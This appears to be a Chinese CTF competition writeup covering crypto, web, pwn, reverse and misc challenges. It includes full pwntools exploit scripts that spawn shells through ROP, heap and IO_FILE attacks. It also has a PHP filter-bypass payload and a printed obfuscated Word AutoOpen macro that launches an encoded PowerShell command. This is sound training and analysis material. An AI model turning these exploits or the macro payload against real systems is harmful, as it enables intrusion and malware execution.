Preface
I really want to go to the on-site round. Why isn't the ranking out yet?
crypto
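Certificate Repair-wgb
We are given three ciphertexts and three public/private key files. The first key is complete, so just recover the plaintext directly.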
flag{You_do_have_a_good_unde
For the second part, throw the whole private key into CyberChef to convert it, then split it by hand
b15d020feef1b8f1e2b44799eaf63dba0906ae6051a96208dcc9089addc477849c81
024100b6f7fc666262d0002a6de03d2b9e5ce3eaa4c22fafa1b92fdc45160a0869cadb60227c7be0a06883044a140d565656de95cad277e774b56b179aadfcd8fa5c57
024100af62379afe7306388e8ab03b9df2e936833881e6d128140dd5d838e191342b9dd982b13cf3efac0a6b94bd2214df785eddc93460e1e306a890ee17ec3bf45ef1023f61ea5428767e6ad1abe3211d9b3a247bd41657d52d285ef23deebadca3a3f9eb6c870817431e94cf887c1c3f06f52d87f0a19a0090dce4396b685bb3f46a07
0241008a1bb5ddfff1643cb542d174a0f4e0616503e28778bd2ecd965026baba357303627d6044b7734cef07b8a1176d886ca987cd21ca091755eef7f20634a921ce81
024100b476cece31a9ec1fa751b36d1d7ed131d6ce1768b7dd63da3647356a8f5041fb2ca4e3a9af05a5451576779b3d6fff0ab63067f50756d44d87270243e5c19c3b
The value of q is given, so just solve it directly.
rstanding_of_certificate_for
The third part is handled in a similar way
e9eb5e816357b25e7a7c4a21c749b9e50e2a97ef44b873ebe1
024100a1a5b680d1d6c14dba3752a2beb7b9758526eb187957da4663283bff00062a774c5d9eaf7d7b52a17594dcc975507e9ad55db9aa061a9158c93be8f3c8b3b655
02410087462d8061c0f6251ca4e9b9dd7d5926d96081d5b52f7b76581365865278f0a13f7051d2ece1dda234c41946211a4839f72b2b5fb82bbfa286d82e868ce87341
024100a59a2709759dfa06baf631fde328ed900133da8b94513e7a69d9f5f3cdbd783071effe7ad7481169c0e7e852d599e842ef3166cd09621488b0bb2c6ca9d403a0
After splitting, it is the standard "known n, e, dp" template, so just solve it directly
mats_and_the_RSA_algorithm.}
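The n, e, dp step above, written out as an added example (not the author's script): it walks a run of back-to-back DER INTEGERs like the 0241 00… fragments above, then recovers p from e·dp = 1 + k(p − 1) by trying every k < e. The key is a constructed toy key built from two Mersenne primes; der_int, split_der_integers, recover_from_dp and demo are names chosen here.

```python
# Added example; every sample value below is constructed, none comes from the challenge.

def der_int(v: int) -> bytes:
    """Encode a small non-negative integer as a DER INTEGER (short-form length only)."""
    body = v.to_bytes(v.bit_length() // 8 + 1, "big")  # leaves room for the sign bit
    return b"\x02" + bytes([len(body)]) + body

def split_der_integers(blob: bytes) -> list:
    """Walk back-to-back DER INTEGER TLVs (tag 0x02) and return their values."""
    values, i = [], 0
    while i < len(blob):
        if blob[i] != 0x02:
            raise ValueError(f"expected INTEGER tag at offset {i}")
        length = blob[i + 1]
        i += 2
        if length & 0x80:  # long form: low 7 bits give the number of length bytes
            n_len = length & 0x7F
            length = int.from_bytes(blob[i:i + n_len], "big")
            i += n_len
        if i + length > len(blob):
            raise ValueError("truncated INTEGER")
        values.append(int.from_bytes(blob[i:i + length], "big"))
        i += length
    return values

def recover_from_dp(n: int, e: int, dp: int):
    """dp = d mod (p-1), so e*dp - 1 = k*(p-1) for some 0 < k < e; try each k."""
    target = e * dp - 1
    for k in range(1, e):
        if target % k:
            continue
        p = target // k + 1
        if 1 < p < n and n % p == 0:
            q = n // p
            d = pow(e, -1, (p - 1) * (q - 1))
            return p, q, d
    raise ValueError("no factor found: n, e, dp do not belong together")

def demo():
    p, q, e = 2**61 - 1, 2**89 - 1, 65537          # constructed toy key
    n, dp = p * q, pow(e, -1, p - 1)
    blob = der_int(n) + der_int(e) + der_int(dp)   # constructed fragment: n, e, dp
    n2, e2, dp2 = split_der_integers(blob)
    p2, q2, d = recover_from_dp(n2, e2, dp2)
    c = pow(int.from_bytes(b"constructed", "big"), e2, n2)
    return p2, q2, pow(c, d, n2).to_bytes(11, "big")

if __name__ == "__main__":
    print(demo())
```

With e = 65537 the loop is at most 65536 iterations, so this runs instantly even for full-size moduli.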
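Triple Secret Shadow-wgb (reproduction)
Throw the whole attachment into CyberChef and a QR code can be extracted; scanning it gives ...--cfadeb-----. An image can also be carved out; it contains Morse code, which decodes to 9273016854. Now for the outrageous part: in the middle of this digit string a 3 happens to sit right next to a 0: 9273[3]0[16854], which echoes the 3 … 0 in the QR code. ???
Damn, anyone who can come up with this is a genius.
At the end of text.txt there is a base64 string starting with @, which decodes to 64 hexadecimal characters. The only hint left in the challenge description is: Stone Memory For…? It is a pun: SM Four -> SM4. So we decrypt with SM4. ??? My bad, I didn't think of it. The key is "9273" + "cfadeb" + "016854" = "9273cfadeb016854", so just knock together an SM4 script.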
web
Between True and False-wgb
PHP source
if (isset($a) && strpos(base64_decode('MW82MmU3ZTYxZTQzZTk0YTE='), $a) && floatval($a) < 10000000 && floatval($a) > 6000000 && strlen($a) <= 4) {
    $obj = (object)$b;
    if (isset($b) && strpos(strrchr(md5(sha1($obj->scalar)),'b1'),'fca7')) {
        echo "You're ok flag\n";
        $c = urldecode($_GET['c'] ?? '');
        if (preg_match('/setItem\s*\(\s*[\'"](.+?)[\'"]\s*,\s*(\[.*\])\s*\)/', $c, $matches)) {
            $m = $matches[1];
            $n = $matches[2];
            $value = json_decode($n, true);
            if (is_array($value) && is_numeric($value[1]) && !is_numeric($matches[1]) && $matches[1] > 2024) {
                if ($value[1] == "9999999999999999" && $value[1] !== "9999999999999999") {
                    $i = $matches[1];
                    echo "<script>$c</script>";
                    echo "<script> var t = window.sessionStorage.getItem('".$i."'); const url = 'inc.php?flag1=1&value=' + encodeURIComponent(t); window.location.href = url; </script>";
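- a=7e6: it is a substring of the target string, it is parsed by floatval, and it satisfies both the range check and the length ≤ 4 check.
- b=1108: makes md5(sha1(b)) contain b1, with fca7 found after that b1 (satisfying strpos(strrchr(…,'b1'),'fca7')).
- c=setItem('2025abc',[0,9999999999999999]): matches the regex, JSON-decodes to an array, $value[1] is numeric and gives the expected results under loose and strict comparison (== is true, !== is true), and the key '2025abc' satisfies both !is_numeric and > 2024 (PHP's type conversion behaviour).
Request it with curl to get the page source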
<br/><script> (function() { var _0x1a2b = document.createElement("div"); _0x1a2b.innerHTML = "<h1>Success is the key to happiness</h1>"; document.body.appendChild(_0x1a2b) } )();</script><script id="spt"> !function() { var _0x3c7b = ["\x63\x6F\x6F\x6B\x69\x65"]; document[_0x3c7b[0]] = "Ao(mgHUKl=<&\AbEBu<QF]NB_COH" }();</script><script id='spt1'> !function() { var _0x29f0 = ['getElementById']; var _0x1f88 = function(_0x304e) { return _0x29f0[0]; }; var _0x1a1a = document[_0x1f88()]('spt'); _0x1a1a && _0x1a1a['parentNode']['removeChild'](_0x1a1a); var _0x3c71 = document[_0x1f88()]('spt1'); _0x3c71 && _0x3c71['parentNode']['removeChild'](_0x3c71); }();</script><script id="flag_base85"></script>
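Base85-decode it to get the result
Six-Piece Set-wgb
Unintended solution: the flag is in /flag.php
What was this web challenge called again?
This challenge left me pretty speechless. /flag.php has a flag, but submitting it is rejected. I originally assumed the author had planted a fake one on purpose, so I worked through it again from the start. The normal route also ends with the itc files: visiting /itc/ gives a 1.txt; move the end of the file to the start of the file and it becomes a rar, which is actually an OpenPGP public key. Use the brute-forced code to extract the archive and that is the flag. I did not get it during the contest; I spent all the time brute-forcing the archive.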
pwn
zeroDay-wgb
Partial RELRO No canary found NX enabled No PIE No RPATH RW-RUNPATH No Symbols No 0 2 ./pwn
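A VM challenge. The input format is opt + value, and option 7 is an arbitrary read. Because there is no PIE, sending b'\x07' + p64(0x404018) leaks libc. In addition, pop and push do not check whether they go past the top of the custom stack, so by popping repeatedly and then pushing, a ROP chain can be written near the rbp of the VM handler function.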
from pwn import *

io = process("pwn")
context.arch = "amd64"
context.log_level = "debug"


def leak(addr):
    io.send(b"\7" + p64(addr))


def push(val):
    return b"\1" + p64(val)


def pop():
    return b"\2"


leak(0x404018)  # puts
io.recvuntil(b"LEAK: [0x404018] = ")
base = int(io.recv(len("0x7f6a8da155c0")), 16) - 0x0000000000084420
success(hex(base))
system = base + 0x0000000000052290
binsh = base + 0x1B45BD
ret = 0x40101A
payload = pop() * 131

io.send(payload)
prdi = 0x0000000000401653
payload = push(prdi) + push(binsh) + push(ret) + push(system)
io.send(payload)
io.interactive()
io-wgb
Full RELRO Canary found NX enabled PIE enabled No RPATH RW-RUNPATH No Symbols No 0 1 io
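A heap challenge. The bug is an arbitrary-address write of a fixed large value.
First set up large bins to leak as many addresses as possible.
Because this is a recent glibc version, consider overwriting mp_.tcache_bins to hijack the tcache bin pointers; after that it is the usual IO exploitation.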
from pwn import *

io = process("./io")
context.arch = "amd64"
context.log_level = "debug"


def menu():
    io.recvuntil(b"4.exit")


def alloc(size, content):
    menu()
    io.sendline(b"1")
    io.recvuntil(b"Content length:")
    io.sendline(str(size).encode())
    io.recvuntil(b"Please input your data:")
    io.send(content)
    io.recvuntil(b"Your data:\n")


def edit(content):
    menu()
    io.sendline(b"2")
    io.recvuntil(b"As if nothing can be done, but it seems useful?")
    io.send(content)


def free(idx):
    menu()
    io.sendline(b"3")
    io.recvuntil(b"Content id:")
    io.sendline(str(idx).encode())


alloc(0x430, b"a")
alloc(0x91, b"a")
alloc(0x420, b"a")
alloc(0x91, b"a")
free(0)
free(2)

alloc(0x420, b"\1")
alloc(0x430, b"a" * 15 + b"z")
io.recvuntil(b"z")
heap = u64(io.recv(6).ljust(8, b"\0"))

free(2)
sleep(1)
alloc(0x430, b"\1")
base = u64(io.recv(6).ljust(8, b"\0")) - 1 - 0x1ECB00  # - 0x211B00
success("heap: " + hex(heap))
success("base: " + hex(base))
mp_tcache_bins = base + 0x00000000001EC2D0  # + 0x2111E8
success(hex(mp_tcache_bins))

_IO_stdfile_2_lock = base + 0x00000000001EE7D0  # + 0x213700
_IO_wfile_jumps = base + 0x00000000001E8F60  # + 0x2101E8
system = base + 0x0000000000052290  # 0x5AF30
chunk1_addr = heap + 0x13E0
# IO_FILE_plus_struct is not provided by pwntools; it has to come from a helper
# library (assumption: pwncli, which ships a class with this name).
fp = IO_FILE_plus_struct()
fp.flags = b" sh;"
fp._IO_write_ptr = 0x1
fp._lock = _IO_stdfile_2_lock
fp.vtable = _IO_wfile_jumps
fp._wide_data = chunk1_addr
fp = bytes(fp)
payload = (b"\0".ljust(0x68, b"\0") + p64(system)).ljust(0xE0, b"\0") + p64(chunk1_addr)

free(1)
free(0)
alloc(0x500, b"a")  # 0

alloc(0x500, b"a")  # 1
edit(p64(mp_tcache_bins))
free(2)
free(0)  # 0x500

dest = base + 0x00000000001ED5A0  # + 0x2124C0 # IO_list_all
alloc(0x430, b"a" * 2 * (8 * 6) + p64(0xDEADBEEF) + p64(dest))
alloc(0x500, p64(chunk1_addr + len(payload)))

alloc(0x500, payload + fp)

menu()
io.sendline(b"4")
io.interactive()
Canary
Partial RELRO Canary found NX enabled No PIE No RPATH RW-RUNPATH 73 Symbols No 0 1 ./canary
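An ordinary canary challenge with PIE off. Debugging shows that option 2 can generate a canary at an arbitrary address, and that jumping back to main gives an unlimited loop. So generate the canary on the bss, leak it with main's write, and finally do a normal ret2libc through gift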
from pwn import *

io = process("./canary")
context.arch = "amd64"
context.log_level = "debug"

io.readline()
io.sendline(b"2")
payload = p64(0x404E80) + p64(0x000000000401296)
io.send(payload)
io.recvuntil(b"Do you want to enter other functions?\n")
io.sendline(b"2")
payload = p64(0x404E80 + 0x51 - 0x8) + p64(0x00000000004012DB)
io.send(payload)
canary = u64(io.recv(7).rjust(8, b"\0"))
success(hex(canary))
io.recv()
io.sendline(b"1")
prdi = 0x00000000004013E3
puts_got = 0x0000000000404018
ret = 0x000000000040101A
prbp = 0x00000000004011DD
prsi_r15 = 0x00000000004013E1
payload = p64(prdi) + p64(puts_got) + p64(0x4010A0) + p64(0x0000000000401256)
payload = (b"/bin/sh\0").ljust(0x38, b"a") + p64(canary) + p64(0x404E80) + payload
io.send(payload)
io.readline()
base = u64(io.recv(6).ljust(8, b"\0")) - 0x0000000000084420  # - 0x875A0
success(hex(base))
system = base + 0x0000000000052290
payload = p64(0) * 3 + p64(prdi) + p64(base + 0x00000000001B45BD) + p64(system)
payload = (0x38 * b"a") + p64(canary) + p64(0x404E80) + payload
io.send(payload)

io.interactive()
Reverse
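I had no time to look at RE during the contest, so this is a reproduction
c-wgb
This also seems to be unintended? I saw flag{djqjnqdwgtj!} in IDA, submitted it directly, and it was accepted. Looking at the logic afterwards, it XORs and then XORs again, so the flag is unchanged
NewRC4-wgb (reproduction)
I had no time to look at it during the contest, assumed it was VMP and bailed. It turned out to be a modified UPX; changing it back is enough.
There is one small pitfall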
void __fastcall TlsCallback_0(__int64 a1, int a2)
{
  __int64 v2; // rax
  unsigned __int64 v3; // rcx

  if ( a2 == 1 )
  {
    v2 = 16i64;
    if ( NtCurrentPeb()->BeingDebugged )
    {
      v3 = 16i64;
      stru_140005080 = _mm_xor_ps((__m128)_mm_load_si128((const __m128i *)&xmmword_1400032A0), stru_140005080);
      qword_140005870 = (__int64)&stru_140005080;
      do
        stru_140005080.m128_i8[v3++] ^= 0x31u;
      while ( v3 < 0x14 );
    }
    stru_140005080 = _mm_xor_ps((__m128)_mm_load_si128((const __m128i *)&xmmword_1400032B0), stru_140005080);
    do
      stru_140005080.m128_i8[v2++] ^= 0x7Au;
    while ( v2 < 20 );
  }
}
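The key is processed here. Just hand it to an AI to write the script; the key and the ciphertext are both easy to find
Full River Red-wgb (reproduction)
Extract the contents of the Word document with an online tool to get the source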
Attribute VB_Name = "ThisDocument"Attribute VB_Base = "1Normal.ThisDocument"Attribute VB_GlobalNameSpace = FalseAttribute VB_Creatable = FalseAttribute VB_PredeclaredId = TrueAttribute VB_Exposed = TrueAttribute VB_TemplateDerived = TrueAttribute VB_Customizable = TruePrivate InitDone As BooleanPrivate Map1(0 To 63) As BytePrivate Map2(0 To 127) As ByteSub AutoOpen()CreateObject(unxor(Array(135, 46, 140, 24, 228, 225, 126, 169, 34, 40, 56), 3) & unxor(Array(201, 1), 14)).Run unxor(Array(137, 123, 117, 87, 89, 140, 200, 174, 138, 204, 135, 229, 75, 9, 168, 39, 117, 219, 2, 212, 118, 230, 128, 213, 197, 44, 99, 93, 193, 144, 49, 210, 70, 175, 228, 16, 187, 75, 36, 215, 144, 31, 223, 159, 127, 45, 9, 205, 183, 34), 16) & _unxor(Array(199, 228, 3, 153, 81, 192, 25, 128, 137, 147, 136, 23, 7, 80, 224, 108, 203, 255, 197, 21, 174, 66, 117, 184, 52, 127, 71, 19, 183, 239, 29, 155, 18, 223, 159, 241, 35, 183, 202, 179, 22, 101, 99, 100, 54, 218, 32, 33, 142, 198, 175, 159, 29, 205, 110, 154, 65, 22, 247, 152, 91, 192, 108, 145, 58, 203, 25, 158, 99, 37, 128, 229, 54, 60, 38, 178, 134, 208, 68, 38, 39, 99, 76, 155, 56, 147, 53, 156, 203), 66) & _unxor(Array(102, 198, 208, 164, 182, 203, 117, 231, 127, 219, 94, 126, 10, 162, 173, 72, 207, 156, 150, 219, 167, 117, 27, 172, 242, 233, 32, 72, 61, 65, 178, 142, 245, 133, 139, 29, 181, 134, 18, 199, 242, 233, 14, 5, 134, 127, 212, 91, 91, 8, 171, 90, 25, 109, 198, 97, 6, 157, 10, 45, 214, 27, 185, 134, 246, 145, 32, 196, 221, 131, 137, 27, 100, 146, 80, 67, 177, 161, 71, 193, 155, 175, 42, 192, 227, 172, 239, 123, 92), 155) & _unxor(Array(234, 141, 79, 179, 223, 15, 203, 43, 171, 112, 201, 234, 98, 141, 170, 14, 174, 104, 46, 107, 122, 18, 176, 138, 238, 208, 78, 126, 217, 208, 197, 2, 219, 144, 118, 145, 213, 45, 173, 225, 233, 161, 66, 174, 198, 108, 46, 184, 249, 150, 178, 36, 223, 5, 41, 60, 105, 114, 110, 110, 40, 134, 139, 35, 41, 235, 57, 182, 60, 105, 58, 175, 196, 240, 224, 144, 250, 156, 14, 138, 217, 9, 147, 115, 55, 
194, 186, 162, 79), 244) & _unxor(Array(209, 193, 20, 114, 189, 230, 8, 167, 240, 61, 224, 242, 135, 166, 38, 7, 87, 151, 117, 148, 46, 97, 158, 117, 106, 143, 40, 126, 199, 26, 83, 196, 211, 16, 152, 203, 123, 22, 248, 60, 127, 38, 179, 12, 140, 170, 29, 148, 133, 77, 82, 213, 53, 92, 146, 151, 236, 151, 74, 37, 118, 16, 28, 157, 49, 18, 131, 195, 167, 133, 54, 214, 12, 248, 32, 108, 36, 131, 65, 250, 97, 12, 26, 10, 182, 16, 34, 15, 10), 333) & _unxor(Array(81, 75, 148, 28, 3, 254, 84, 127, 57, 78, 30, 146, 239, 82, 115, 175, 20, 208, 87, 218, 140, 50, 189, 210, 111, 35, 12, 128, 1, 116, 208, 150, 230, 88, 166, 120, 35, 106, 166, 121, 243, 216, 251, 46, 25, 196, 102, 54, 130, 52, 233, 123, 103, 240, 146, 114, 144, 49, 205, 121, 89, 126, 226, 239, 23, 51, 71, 7, 184, 111, 154, 71, 39, 28, 191, 99, 43, 237, 59, 241, 187, 84, 205, 162, 82, 62, 227, 183, 145), 422) & _unxor(Array(220, 194, 134, 110, 158, 136, 28, 157, 6, 28, 18, 29, 219, 15, 42, 69, 202, 26, 210, 214, 48, 60, 156, 210, 88, 81, 191, 153, 36, 72, 192, 205, 71, 101, 125, 96, 84, 172, 113, 120, 112, 252, 31, 16, 92, 180, 3, 4, 127, 58, 214, 173, 165, 31, 64, 250, 139, 176, 79, 89, 136, 249, 48, 37, 153, 201, 184, 51, 155, 186, 96, 121, 74, 163, 28, 131, 230, 74, 186, 237, 17, 163, 101, 17, 51, 1, 78, 40, 101), 511) & _unxor(Array(173, 96, 11, 202, 44, 219, 158, 69, 217, 56, 179, 84, 118, 152, 185, 163, 20, 92, 3, 211, 142, 226, 92, 27, 150, 191, 222, 95, 105, 58, 87, 200, 109, 108, 90, 41, 190, 252, 39, 215, 215, 150, 117, 140, 19, 0, 206, 174, 60, 83, 253, 136, 153, 112, 28, 55, 54, 1, 131, 65, 74, 92, 97, 135, 64, 80, 192, 181, 183, 54, 130, 9, 197, 65, 182, 38, 196, 1, 248, 217, 155, 50, 57, 1, 135, 114, 53, 68, 126), 600) & _unxor(Array(246, 123, 20, 204, 50, 152, 85, 111, 106, 210, 2, 247, 48, 159, 65, 255, 33, 131, 91, 157, 245, 204, 232, 223, 23, 163, 243, 109, 81, 181, 198, 99, 13, 150, 202, 151, 133, 228, 53, 192, 53, 212, 255, 30, 218, 222, 76, 176, 230, 46, 127, 0, 251, 133, 0, 75, 6, 98, 143, 
221, 135, 70, 86, 153, 72, 105, 167, 91, 77, 86, 67, 240, 157, 143, 239, 49, 103, 247, 44, 158, 232, 23, 50, 225, 15, 179, 237, 94, 120), 689) & _unxor(Array(21, 83, 142, 200, 60, 47, 222, 133, 241, 121, 102, 78, 134, 204, 252, 118, 74, 8, 97, 95, 138, 94, 62, 159, 44, 75, 147, 70, 175, 185, 75, 205, 218, 38, 251, 211, 199, 207, 11, 12, 118, 242, 74, 62, 19, 187, 36, 239, 38, 120, 58, 21, 17, 110, 113, 192, 57, 6, 111, 168, 102, 244, 147, 53, 151, 47, 247, 65, 123, 74, 183, 87, 167, 131, 236, 21, 60, 168, 168, 109, 249, 113, 164, 208, 138, 110, 252, 219, 183), 778) & _unxor(Array(220, 77, 218, 41, 229, 2, 88, 252, 106, 253, 236, 187, 215, 59, 193, 15, 32, 150, 231, 159, 48, 149, 160, 224, 111, 182, 39, 147, 118, 135, 109, 38, 249, 118, 63, 205, 247, 94, 37, 175, 100, 222, 164, 108, 71, 245, 42, 113, 7, 181, 87, 188, 28, 71, 172, 75, 129, 136, 82, 8, 238, 65, 105, 125, 243, 190, 156, 168, 181, 28, 153, 190, 197, 25, 147, 84, 135, 79, 188, 11, 18, 30, 138, 195, 228, 177, 172, 230, 163), 867) & _unxor(Array(116, 194, 246, 44, 213, 63, 75, 126, 78, 201, 230, 241, 205, 28, 240, 125, 46, 241, 50, 61, 113, 118, 113, 86, 190, 61, 41, 156, 140, 82, 85, 106, 154, 150, 116, 59, 37, 253, 214, 245, 112, 156, 68, 246, 220, 182, 181, 189, 58, 225, 9, 164, 170, 238, 237, 86, 187, 55, 95, 125, 41, 240, 254, 175, 112, 213, 7, 13, 2, 246, 86, 176, 29, 97, 105, 229, 127, 121, 158, 77, 51, 32, 116, 104, 213, 158, 211, 231, 161), 956) & _unxor(Array(129, 43, 134, 12, 8, 25, 228, 210, 145, 230, 100, 15, 197, 93, 157, 207, 26, 89, 220, 180, 84, 164, 102, 26, 249, 193, 34, 39, 225, 173, 136, 48, 2, 189, 79, 149, 126, 91, 99, 100, 89, 230, 239, 55, 238, 118, 200, 215, 212, 103, 180, 29, 169, 169, 86, 253, 76, 43, 205, 184, 10, 200, 239, 162, 140, 127, 45, 214, 133, 132, 32, 46, 221, 66, 49, 28, 237, 233, 29, 55, 34, 233, 243, 91, 27, 182, 146, 58, 210), 1045) & _unxor(Array(221, 59, 115, 92, 39, 169, 26, 171, 5, 50, 197, 131, 119, 184, 107, 4, 29, 192, 53, 48, 132, 208, 65, 239, 155, 255, 
215, 11, 24, 223, 136, 184, 64, 53, 126, 130, 187, 163, 164, 231, 37, 66, 251, 28, 11, 234, 2, 4, 164, 226, 66, 129, 205, 228, 64, 161, 54, 125, 62, 224, 56, 131, 134, 191, 223, 120, 130, 17, 7, 109, 154, 190, 7, 142, 154, 136, 163, 62, 125, 20, 97, 205, 30, 51, 252, 229, 116, 237, 29), 1134) & _unxor(Array(250, 244, 208, 17, 50, 212, 135, 122, 49, 134, 155, 37, 131, 204, 239, 166, 215, 221, 49, 134, 92, 63, 41, 197, 73, 176, 26, 30, 134, 119, 176, 123, 215, 56, 159, 8, 66, 175, 127, 67, 73, 174, 128, 162, 142, 209, 1, 136, 92, 160, 147, 191, 233, 99, 132, 42, 11, 107, 188, 42, 221, 194, 18, 107, 174, 79, 16, 20, 104, 155, 183, 188, 119, 207, 27, 251, 1, 131, 14, 91, 61, 115, 233, 57, 143, 178, 128, 246, 87), 1223) & _unxor(Array(214, 95, 231, 84, 214, 176, 235, 78, 206, 44, 143, 68, 150, 97, 49, 48, 56, 82, 156, 68, 43, 117, 63, 134, 143, 30, 38, 64, 222, 22), 1312)End SubPublic Function Base64Decode(ByVal s As String) As Byte() If Not InitDone Then Init Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s) Dim ILen As Long: ILen = UBound(IBuf) + 1 If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "" Do While ILen > 0 If IBuf(ILen - 1) <> Asc("=") Then Exit Do ILen = ILen - 1 Loop Dim OLen As Long: OLen = (ILen * 3) \ 4 Dim Out() As Byte ReDim Out(0 To OLen - 1) As Byte Dim ip As Long Dim op As Long Do While ip < ILen Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1 Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1 Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A") Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A") If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _ Err.Raise vbObjectError, , "" Dim b0 As Byte: b0 = Map2(i0) Dim b1 As Byte: b1 = Map2(i1) Dim b2 As Byte: b2 = Map2(i2) Dim b3 As Byte: b3 = Map2(i3) If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _ Err.Raise vbObjectError, , "" Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10) Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4) Dim o2 As Byte: o2 = ((b2 
And 3) * &H40) Or b3 Out(op) = o0: op = op + 1 If op < OLen Then Out(op) = o1: op = op + 1 If op < OLen Then Out(op) = o2: op = op + 1 Loop Base64Decode = Out End FunctionPrivate Sub Init() Dim c As Integer, i As Integer i = 0 For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next Map1(i) = Asc("+"): i = i + 1 Map1(i) = Asc("/"): i = i + 1 For i = 0 To 127: Map2(i) = 255: Next For i = 0 To 63: Map2(Map1(i)) = i: Next InitDone = True End SubPrivate Function ConvertStringToBytes(ByVal s As String) As Byte() Dim b1() As Byte: b1 = s Dim l As Long: l = (UBound(b1) + 1) \ 2 If l = 0 Then ConvertStringToBytes = b1: Exit Function Dim b2() As Byte ReDim b2(0 To l - 1) As Byte Dim p As Long For p = 0 To l - 1 Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1)) If c >= 256 Then c = Asc("?") b2(p) = c Next ConvertStringToBytes = b2 End FunctionPrivate Function unxor(ciphertext As Variant, start As Integer) Dim cleartext As String Dim key() As Byte key = Base64Decode("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" & _"l3sd196txhtnIlFZyHBc5IKXxHCbTa5hLl3CBpEgbn1I2FFhaEsYCtVyQrkdPmA5X6CuFhjuRacVoM131pMLVE7IQDG717EZ5BdiLOc4pb+5Q1iMAXfQQ6soJrjxM8ZgjzQYO5WuQkQFdfko6QZEa/0QaqhysOozj/sTeoj2wI2A0C/bwV35cV5EXJNOawqbWJCXdwzdsD8QjNhiDYGYFicJIRD5MBshvm1RGv1CZz54n+ziSgGe2vJ6GMy4cWv+i+hy0/shNgvhVcKuJfuPZuFUUHtqD3w07yZKj2ma+iKYCvIRO9nu8lYOQpbbowha1OyfGzx7BJkvJxth3b1xoJaiNMRwQZz/fiC8zvYxTlB0bsIHKR07xgI8gfCDd+NIhwL3YbdAor7ZfHhH3jNhBTykOlyrc/0yLQSTR8dx0BC9QMIerbSCqZ1Q4rUGEPiXIVvXjtrEhnSBTZW4U5uJHfGQbzlVuuRRCUAjyIzGCDHbDCjvEgwbNLLEzqdeJrh9" & 
_"3K1WddVO4bwcKlQb14luWJzBsDwrD8u7vi8LTRIe6A982G0Oygf6+Am9m2GIkp6eSWY3tSF/cOpmuWc+d1RCPzO5eEAm6TWT0ULWZ5QAMD31GObEpVRZ+eoCuDSckd0JvrP2lBSbZKRADL0unq3vhnmyTmflpvtH15ahJ+9mxgHGH2exGX6vgBx17iyx5T4WtBowQsIW310F1QrH6xNfvwM9PLv/3czSXs//jUDSB/AN60pVccuZtfPvp+ZMg6d9l0UKNiWIq7CMKbE7Z7BWWjNEMBPdfGbNzmQULvHXOXpnlZeyNd0ht57x9PljoFDD6N+sEuJ2DRprg7/qNZRJekOAF/VIID2SPgDfCkRhLg+Xq5KgysBO4U5nWKGD0IM1TYcc24pbCY31beUlebiKc2aS7MtxQ+o41wQaJQ8Ys5h13jeNgpUz5Vzc6BGWDUm6+X+Jqu/NK1qUy8Vmb5wXVl6BqFt6Y7yEGWv31QKTiVwyKWbuV+pRRYf3NvAqRX6n" & _"d1zFmAyuzoiVe1masPkUUjz2+uacpn8DuVpKrDJF64UDt4yhEeBsLHykecS+/r0pwEBGJdP/Vd/Y3OJ4MFUqnF9UvaYfrFG7trJQepnGH2DE4WTFna70hp9Fxx8LaJMI8lxfwBDxH5Z56kkF+j4hLuzq48vpQNId4tn+rFfFeHwp2GuZrVMkyQ1SVSDW9uUAjWu6ROhPEGwyjnjM2cG6MJQmphOD8bIfjGnOAscgU0d6FN0BHzRtx85xZwO1Vw==") cleartext = "" For i = LBound(ciphertext) To UBound(ciphertext) cleartext = cleartext & Chr(key(i + start) Xor ciphertext(i)) Next unxor = cleartextEnd Function
There is base64 here plus a custom xor; decrypting it directly yields a PowerShell command
powershell -e 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
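The macro's unxor routine ported to Python for static analysis, as an added example that is not part of the original writeup: it finds every unxor(Array(...), start) call in extracted VBA text and decodes it without opening the document. The key, the strings and the sample macro line are constructed; SAMPLE_KEY, make_call and build_sample are hypothetical helpers.

```python
import base64
import re

# Matches unxor(Array(1, 2, 3), 16); also hits "_unxor(" left behind when
# the "& _" line continuations are flattened, as in the dump above.
CALL_RE = re.compile(r"unxor\(\s*Array\(([\d,\s]+)\)\s*,\s*(\d+)\s*\)")

def unxor(ciphertext, start, key):
    """Port of the macro's unxor: element i is XORed with key[i + start]."""
    return "".join(chr(key[i + start] ^ c) for i, c in enumerate(ciphertext))

def deobfuscate(vba_source, key_b64):
    """Decode every unxor(Array(...), start) call found in the VBA text, in order."""
    key = base64.b64decode(key_b64)
    decoded = []
    for m in CALL_RE.finditer(vba_source):
        numbers = [int(x) for x in m.group(1).split(",")]
        start = int(m.group(2))
        if start + len(numbers) > len(key):
            raise ValueError(f"key too short for call at offset {m.start()}")
        decoded.append(unxor(numbers, start, key))
    return decoded

# --- constructed sample: hypothetical key and strings, not taken from the challenge ---
SAMPLE_KEY = bytes((i * 37 + 11) % 256 for i in range(64))

def make_call(text, start, key=SAMPLE_KEY):
    """Build one obfuscated call the way the macro stores its strings."""
    nums = ", ".join(str(ord(ch) ^ key[i + start]) for i, ch in enumerate(text))
    return f"unxor(Array({nums}), {start})"

def build_sample():
    """Return (constructed one-line macro statement, base64 of the constructed key)."""
    source = ("CreateObject(" + make_call("Sample.Object", 3) + ").Run "
              + make_call("echo ", 16) + " & _" + make_call("constructed", 21))
    return source, base64.b64encode(SAMPLE_KEY).decode()

if __name__ == "__main__":
    src, key_b64 = build_sample()
    print(deobfuscate(src, key_b64))
```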
ProcessHacker
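Just read the memory; the Windows VM did great work
Algorithm Combination (reproduction)
The first part is an AES-variant encryption, the second part is XOR with 0x42, the third part is Caesar, and the fourth part I did not really understand. I handed it to an AI, which understands it better than I do. Truly helpless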
misc
Format-8bit-wgb
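There is an archive appended to the end of the file; foremost or manual carving in 010 can both separate it. The extracted text is garbled; using this online decoding site, the flag shows up directly under GB2312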
non-interlaced-wgb
